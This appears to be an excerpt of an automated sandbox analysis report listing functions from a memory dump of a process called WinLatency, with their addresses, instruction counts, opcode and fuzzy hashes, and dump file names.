Opcode ID: 6b0cc3b7165289689810d6f9c1e2e5c99de19d4546ef2652acb20c75da21a990
Instruction ID: cfa2f3a0d48a4d5cb4e164dd4ac8ef2cdd36ec82ca1257a358e43316158012f5
Opcode Fuzzy Hash: 6b0cc3b7165289689810d6f9c1e2e5c99de19d4546ef2652acb20c75da21a990
Instruction Fuzzy Hash: 0451E7B1A1962D8FDBA8DF58C8A57A8B7B1FF54301F1001E9D14DA32A1CB746E818F45

Function 00007FFD9B75DD29 Relevance: 1.7, Strings: 1, Instructions: 450COMMON

Download Yara Rule

Strings

", xrefs: 00007FFD9B75E03F

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 10378fbe6b69b501fdbd70c7ab5d3c032f045acd8aa53030ca7eb645af7ef001
Instruction ID: 073e9beb171a5e22fcfbd93cb01376d529966caf823dbe0ab2eca9d939f982b2
Opcode Fuzzy Hash: 10378fbe6b69b501fdbd70c7ab5d3c032f045acd8aa53030ca7eb645af7ef001
Instruction Fuzzy Hash: FAF13D71E1965D8FEBA8DFA8C464BB8B7A1FF58300F5001BAD01DD72E6DA746981CB40

Function 00007FFD9B75C668 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

T_H, xrefs: 00007FFD9B75C673

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: T_H
API String ID: 0-1927126723
Opcode ID: bc0ebb79dc52879f14c87f3b396846d066c81a5d0938c892505e98badfbcc310
Instruction ID: f0264c262abffb2344e9574d7f59dbf69683208451cdc98de874785a5a447c5f
Opcode Fuzzy Hash: bc0ebb79dc52879f14c87f3b396846d066c81a5d0938c892505e98badfbcc310
Instruction Fuzzy Hash: 9A310A71E09A1D8FDBA4EBE8D8656FCB7B1FF59300F51023AD00DD32A1DE6469428B40

Function 00007FFD9B75EBA3 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

+, xrefs: 00007FFD9B75EC76

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: b7313c06a7db0bae8065adfe3fdf9a4d3a71b9c64b235534d18c4a98f1caafab
Instruction ID: b9f98c749fc7a8426a81b46cf6faa660ce5c84afc34e1182508a6dd21b293cde
Opcode Fuzzy Hash: b7313c06a7db0bae8065adfe3fdf9a4d3a71b9c64b235534d18c4a98f1caafab
Instruction Fuzzy Hash: EA31B570E0562D8FDBA9DF54C8A0BA9B7B6EB54300F4002EAD04DA72A1CB746F81CF11

Function 00007FFD9B75EF0A Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

g, xrefs: 00007FFD9B75EF24

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 362531d17837e60e135d553d25cc21c1e71e21e5378401ef5fe758cfd62f5299
Instruction ID: af38d22beab60d0afba88b7d898e8c9dffffdf26d97b57bf245eadb9d4d4b219
Opcode Fuzzy Hash: 362531d17837e60e135d553d25cc21c1e71e21e5378401ef5fe758cfd62f5299
Instruction Fuzzy Hash: 60D0C930A0871C8BDB65DA84C8A17AD73B5AB04300F0001E4D00C972A0CB747F81DF41

Function 00007FFD9B750525 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a579bb8fb80235f4c07d093bc5ff1bb1f919acdbbc4809ca9a939d20b6b9624
Instruction ID: f89677f0be957e9ad8b4ab54a0e882fa413ccb0d7ded00836c322ea163aee008
Opcode Fuzzy Hash: 1a579bb8fb80235f4c07d093bc5ff1bb1f919acdbbc4809ca9a939d20b6b9624
Instruction Fuzzy Hash: D0B13457B0F7C61EF72166FC68628FD3B55DF5266470902F7E0988A0F7DD0869078690

Function 00007FFD9B75DDA9 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8773e95d1ae8f09d210f310afe6ca4517dad24edc5b1702a8773e1feb95a12c
Instruction ID: 1b57be7ff8acf0a0d764cc170b6649964e28462b3bc42f80ab6b447e00239487
Opcode Fuzzy Hash: f8773e95d1ae8f09d210f310afe6ca4517dad24edc5b1702a8773e1feb95a12c
Instruction Fuzzy Hash: 29C14171E19A5D8FEBA8DF98C864BB8B7A1FF54300F0401BAD01DD72E6DA746941CB41

Function 00007FFD9B7505A0 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf7e5060c86efbde50cced998104547907dae06fd288c432b8c98795d405c4ae
Instruction ID: eb8928744fe11a0fe7c0a831fd38b356d22b874ccbf2440c2a67a9b94e44df00
Opcode Fuzzy Hash: bf7e5060c86efbde50cced998104547907dae06fd288c432b8c98795d405c4ae
Instruction Fuzzy Hash: 17912393A0F7C60EF72166FC28355F93F95EF52664B0902F7E0988A0F7ED4869078295

Function 00007FFD9B75060D Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8df727d9b726b16afc34cbef36a66239889a13a6fec4d06b79b531d62ffab67
Instruction ID: 172a7d77a960c75ee43780d8c719b5e944356ae7ad4326a412bdb79b0242f378
Opcode Fuzzy Hash: c8df727d9b726b16afc34cbef36a66239889a13a6fec4d06b79b531d62ffab67
Instruction Fuzzy Hash: E1812393A0F7C60FF72166FC28255F93F95EF92664B0902F7E0988A0F7DD5869078285

Function 00007FFD9B750638 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96fe049d0a1807f36b4ca4babf70c18c2f86f4a30d727a960321ccb863a425de
Instruction ID: c923525b7d175f43098a31071ceab3ebb614b120838c916ee85576870117d441
Opcode Fuzzy Hash: 96fe049d0a1807f36b4ca4babf70c18c2f86f4a30d727a960321ccb863a425de
Instruction Fuzzy Hash: 6B812893A0FBC60FF72166FC68255F93F95EF5266070902F7E0988A0F7DD54A9078281

Function 00007FFD9B751698 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04be9e4f4b7d3d4d2dd38f9153902c62d5167c656e113bffa31c0662f550c1b9
Instruction ID: e31190a6366759bf8ba5248628a673b4dda871740c6dfc16987ba9eaacd1f5f7
Opcode Fuzzy Hash: 04be9e4f4b7d3d4d2dd38f9153902c62d5167c656e113bffa31c0662f550c1b9
Instruction Fuzzy Hash: C881DE31B0DB8D4FDB58DE9C88655A977E2EFD8301B15427EE49DC32A2DE74AD028780

Function 00007FFD9B750640 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d19140f9cb0e17bd00998ebb4e3191269aeb124a61aa035f463d71251805dcce
Instruction ID: f32d85aa2a2c664c0148893fada95f0cfb3e2b93762865c86082fc823bb3b2cf
Opcode Fuzzy Hash: d19140f9cb0e17bd00998ebb4e3191269aeb124a61aa035f463d71251805dcce
Instruction Fuzzy Hash: FB712693A0F7C60FF72566FC28255F93F95EF52660B0902F7E0988A0FBDD5869078285

Function 00007FFD9B75B29D Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 780363ed1618b2c376418d3e089b90ecfe167477a8bcf032174e934acd5013b9
Instruction ID: a9fbb8c439ed560d35cbe51e41eb84b614c07b623322d58c62693f4a8b166059
Opcode Fuzzy Hash: 780363ed1618b2c376418d3e089b90ecfe167477a8bcf032174e934acd5013b9
Instruction Fuzzy Hash: 5A611731A0E64E9FE7519FF888295F97BE0FF55300F0605BAD058C71B2EE65A60AC350

Function 00007FFD9B751CCD Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a76981b9ff506bce42c3793286d7a13fab5c14a30c78510acdb264ce9baa6064
Instruction ID: 48208a790231a500962ba37b33019be16c7bcc530e3ed6e4617ecf963c25011b
Opcode Fuzzy Hash: a76981b9ff506bce42c3793286d7a13fab5c14a30c78510acdb264ce9baa6064
Instruction Fuzzy Hash: 8761D331B09B8D4FDB58DE9888615BA73A2FF98301B15427ED45EC36A2CE75ED028780

Function 00007FFD9B752215 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8bf59ff7518d466063ab20be680b9bc4858c47ee052e5cc2949089e512e94c2
Instruction ID: c3f03db30850c618950ae26c775b7a0dffcd1acb82d321eabf12bb3226eddcde
Opcode Fuzzy Hash: d8bf59ff7518d466063ab20be680b9bc4858c47ee052e5cc2949089e512e94c2
Instruction Fuzzy Hash: 9A61C935E0E71E8AEB749AE484217F9B7A0AF05310F1203B9D05D961F2DEB56B46CB81

Function 00007FFD9B75B1C8 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6fdc96cf421c326071c98554d8ce5fff78b5b86ab8328570a31ca12cf0d437
Instruction ID: ca0385c7cf4024f49ed7ccc3dfc65e59b3c0904b0ff8ac7aa9fab9822df458c5
Opcode Fuzzy Hash: 1d6fdc96cf421c326071c98554d8ce5fff78b5b86ab8328570a31ca12cf0d437
Instruction Fuzzy Hash: 83512D70E0961D8EEB64EBE8C4657FD7BB1EF58300F11027AD00AE72A1DE746A42CB50

Function 00007FFD9B75CBED Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b9103cccce1578d16c86351a7563221179df2b5c504b58baa2a66ebf99da5a4
Instruction ID: ea4b3a4091e58efa7f0a6b6b9fe1f7fe73caf595a4e19ba430da15ed09fb32ef
Opcode Fuzzy Hash: 8b9103cccce1578d16c86351a7563221179df2b5c504b58baa2a66ebf99da5a4
Instruction Fuzzy Hash: 17513E70E1961D8EDB64EBA8C465BEDB7B1FF58300F51067ED00EE32A1DE7869418B50

Function 00007FFD9B7520E5 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffcab4547fe4e53de25ff04d828b3d694da38bbbb18632db2a938a495756eff2
Instruction ID: 1184a68cf92ff05e790043a227da1ffc3e070157dc31dc17acb967c04998ff08
Opcode Fuzzy Hash: ffcab4547fe4e53de25ff04d828b3d694da38bbbb18632db2a938a495756eff2
Instruction Fuzzy Hash: 2541E431F0E64E4FE7659BF888655B97BD0EF85310F0602BAD40DC71B6DE58A9428351

Function 00007FFD9B7531B1 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4294eae54ea6ab167c087b2fcf66d882b7bac0ba8be218dc3cfc5768078874dd
Instruction ID: 26164f2b623bbb965afa7f6b1c01f9919f90c6fe14b1cb72ff87a3bbfe360ad1
Opcode Fuzzy Hash: 4294eae54ea6ab167c087b2fcf66d882b7bac0ba8be218dc3cfc5768078874dd
Instruction Fuzzy Hash: 5041CF31E0AA0E8EEB64DBE4C4646FD77B0EF45311F16423AD00AD71B1DEB8A6468B10

Function 00007FFD9B751231 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 029a4abffde3d5664794a8da29453da6f02eae1d95c687a838c391fb3d34e59c
Instruction ID: 7ba828576edbe2c7a19756bb226691deeac0f7ad1ce9697a50e9ba2ca27b5439
Opcode Fuzzy Hash: 029a4abffde3d5664794a8da29453da6f02eae1d95c687a838c391fb3d34e59c
Instruction Fuzzy Hash: 1B41E631F0964E4FEBA8EBA8D4646F977A1FF59301F010179D01AD75F2DE65AA01C740

Function 00007FFD9B75CD6D Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 367ee4affeea75f76f3e72eaf2e3ce7d0a8c626894697a939a579e2fe4a80d57
Instruction ID: 6f4c6d652e93fdabc093535a4b2a3bba0382437ed1128a999d6c540a346e19d2
Opcode Fuzzy Hash: 367ee4affeea75f76f3e72eaf2e3ce7d0a8c626894697a939a579e2fe4a80d57
Instruction Fuzzy Hash: A631E167B4E76A4EE7657AF8A4205FC7BA0EF51320B050277E559C60F2CE6839828690

Function 00007FFD9B75C6E0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936759d94ca36573854d21b81ed2516d9181b4e39cb484adad9280e2c38b2213
Instruction ID: d0160727364888c99bc1e7f28bf2cd193546ef2b26a7e24c46c154aceac4df5f
Opcode Fuzzy Hash: 936759d94ca36573854d21b81ed2516d9181b4e39cb484adad9280e2c38b2213
Instruction Fuzzy Hash: 86311071E09A1D8FDBA4EFE884A56BC77B5FF59300F410279D00DD76A2DE6569028740

Function 00007FFD9B75AA19 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22ec7e8adde5287cfa5e8e3bd909e4fdedefa9b17d787f6ee5252f49456c77de
Instruction ID: b72cd89f1b54d03273d304943280582f9166177fd4b117353e282e16e93f2807
Opcode Fuzzy Hash: 22ec7e8adde5287cfa5e8e3bd909e4fdedefa9b17d787f6ee5252f49456c77de
Instruction Fuzzy Hash: 16317E30A0964E8FDF99EF98C465ABE37F1FF68304B1101BAE419C71A5CB34A951CB80

Function 00007FFD9B750805 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e05c53e7d6cf65389b9fa0ca3632ea464ef683483c4b93e194752765e13f656
Instruction ID: cda51973dfb287a0286149c84dcde8c224d2b99ce288e255fa340814d2b5b827
Opcode Fuzzy Hash: 4e05c53e7d6cf65389b9fa0ca3632ea464ef683483c4b93e194752765e13f656
Instruction Fuzzy Hash: 1D213B62A0E7469BE72067FC987AAE93BD0EF12714F0A01B7D09DD90A3DD18B1578291

Function 00007FFD9B750A01 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80b6b9dabfe4cd82dcdd6b6c14d0737f56a28c741d2b03381bf5bc93250f67c5
Instruction ID: cded98bea697f916edf5877d087afec73338760bbc0d92ec80dade7a49aa82cc
Opcode Fuzzy Hash: 80b6b9dabfe4cd82dcdd6b6c14d0737f56a28c741d2b03381bf5bc93250f67c5
Instruction Fuzzy Hash: D321B335E0E60E4EFBA0EBE888695F977E0FF55700F414676D41DC60B6EE74A6428700

Function 00007FFD9B750AA1 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89c106aad7e07c1fd4ebfbf2eb6422fc6f5fed331502e97bb616e57eeb1f5c4e
Instruction ID: 1a760a451d1c51c489bd6e3a2e5a029f1d2e4d7f92bb94ef81189b83cfb8eee9
Opcode Fuzzy Hash: 89c106aad7e07c1fd4ebfbf2eb6422fc6f5fed331502e97bb616e57eeb1f5c4e
Instruction Fuzzy Hash: 9A21C231A4E60F4FE7A1EBE888699B937E1FF16300F0206B6D018C70B6EE64A9018700

Function 00007FFD9B7532A8 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f11403d28c935d3568e2edbb337df52b041abb32e58687961e0788d7b062987
Instruction ID: 29b94a7baa841f050e7f9eca52129b021911ef8a365f1bdd02410313356c7d85
Opcode Fuzzy Hash: 9f11403d28c935d3568e2edbb337df52b041abb32e58687961e0788d7b062987
Instruction Fuzzy Hash: 6131F671E0961D8FEB68DBD8C464AECBBB1EF58301F554139D00AE72B5CA786A41CB10

Function 00007FFD9B75D856 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c34594cdc4a47bd270fa69ad4bd205055fb118449c7a63c37efb99e2b0b9fdca
Instruction ID: 7c52edfeef7641c86c2d201e11d888b8fd6fc5103add455ac724a689c86a8f13
Opcode Fuzzy Hash: c34594cdc4a47bd270fa69ad4bd205055fb118449c7a63c37efb99e2b0b9fdca
Instruction Fuzzy Hash: B321F870E1961E8FDB64EFD8D461AFDB7B0EF49311F11013AD009F72A1DA7866428B40

Function 00007FFD9B75C0E5 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab95eb8f161f01efeb3bea1e0c79cc8608121c39b9e55659a70158d709b80d0
Instruction ID: c2218b07502694f5d9c09aa2dad453e2038aa5e3f761534870dc94867ae9262b
Opcode Fuzzy Hash: cab95eb8f161f01efeb3bea1e0c79cc8608121c39b9e55659a70158d709b80d0
Instruction Fuzzy Hash: 0E218B31E1A60E8FEBA4EBB888697B93BE0EF18305F11057AD41DC61B1EE74A6518700

Function 00007FFD9B75A971 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ab1157815567438875bf87522bd91e99c5456f68e3f54d2345b915f6e9bfc15
Instruction ID: b8ebc298fb6c27a99b652841a3413710149e148850387f08d65d674dbdecec25
Opcode Fuzzy Hash: 8ab1157815567438875bf87522bd91e99c5456f68e3f54d2345b915f6e9bfc15
Instruction Fuzzy Hash: A3214F70A1964D8FDB84EF58C455AA937F0FF69305F12017AE819D3265DB34A551CB40

Function 00007FFD9B752E21 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91a3a0baff09512f3c8d232c80e6c4136087080df608a31c0c52418b9aa7ff19
Instruction ID: 3580082b06af4f255b4a26fbb5a13f6800f10bd49ab1f26ea062b4b521e2d5ef
Opcode Fuzzy Hash: 91a3a0baff09512f3c8d232c80e6c4136087080df608a31c0c52418b9aa7ff19
Instruction Fuzzy Hash: F5117C31E5E64F4EEBA0ABE488695B937E0EF19304F0206B6D41CC70B6EE74A6858600

Function 00007FFD9B7527FD Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c298cb5e6ec86957550237a9a977014eecc85abcaf78a8920a94847ca2d2e446
Instruction ID: da5a3a45db75628a41b4592d14bb3745f1cdf5c41280568934b04bc7c9c55f4a
Opcode Fuzzy Hash: c298cb5e6ec86957550237a9a977014eecc85abcaf78a8920a94847ca2d2e446
Instruction Fuzzy Hash: C6218E31E0A60E8FEB64ABE488695F937E4FF59301F01497AD408C61B5EE78E6558600

Function 00007FFD9B7508E5 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a17250a76fabd4abb8c1b3da039ef64596891d2c28da97d5fee177511858b550
Instruction ID: baa84a5e9d482f72e3686768611e9946b28b34577da176f9ec6069b82d9a9870
Opcode Fuzzy Hash: a17250a76fabd4abb8c1b3da039ef64596891d2c28da97d5fee177511858b550
Instruction Fuzzy Hash: F411B631E4E70E4EF761AAF484596F937D0EF56700F124A76D40CC60B6EE74B6558640

Function 00007FFD9B75B3C1 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d08c3da0fcb82fceab9e66351425d21138c91bfc1adc0559dd334df1589f7779
Instruction ID: ccf6d41e5025b6a8974fa4c6c985b57c2bc23b0e7a1f39260d2a48aa542a4018
Opcode Fuzzy Hash: d08c3da0fcb82fceab9e66351425d21138c91bfc1adc0559dd334df1589f7779
Instruction Fuzzy Hash: 4C118631E1E74F4BEB65AEE898651B976D0EF55300F4206B6E419C72B2EE64B6058240

Function 00007FFD9B751C4D Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a234a6c6056e932015902f94057ecb71860bf2f3046993a1acb20998ccb9be
Instruction ID: 0ab3dbeb4c3e3ac58ef43ad14ff2a500509aad0be61da1c16f14f79ba373f5f9
Opcode Fuzzy Hash: e1a234a6c6056e932015902f94057ecb71860bf2f3046993a1acb20998ccb9be
Instruction Fuzzy Hash: 3511D330A4A74E8FEB689F9488652F937A0EF55302F11457AD80DC24F1DB75AA51C740

Function 00007FFD9B7534E5 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1884923268.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffd9b750000_WinLatency.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc78bbd481098808524aa68f9a1d6fab420b7168af215f5dd5b80fa4c28bb631
Instruction ID: 77783853792ac3289a2d0672c84047fa6125a8c128966735786265dc9d63ed3f
Opcode Fuzzy Hash: dc78bbd481098808524aa68f9a1d6fab420b7168af215f5dd5b80fa4c28bb631
Instruction Fuzzy Hash: DB118231E0A24E8FEB69DFE488255BE77A0FF05300F02057AE41EC61F2DB74A6118710

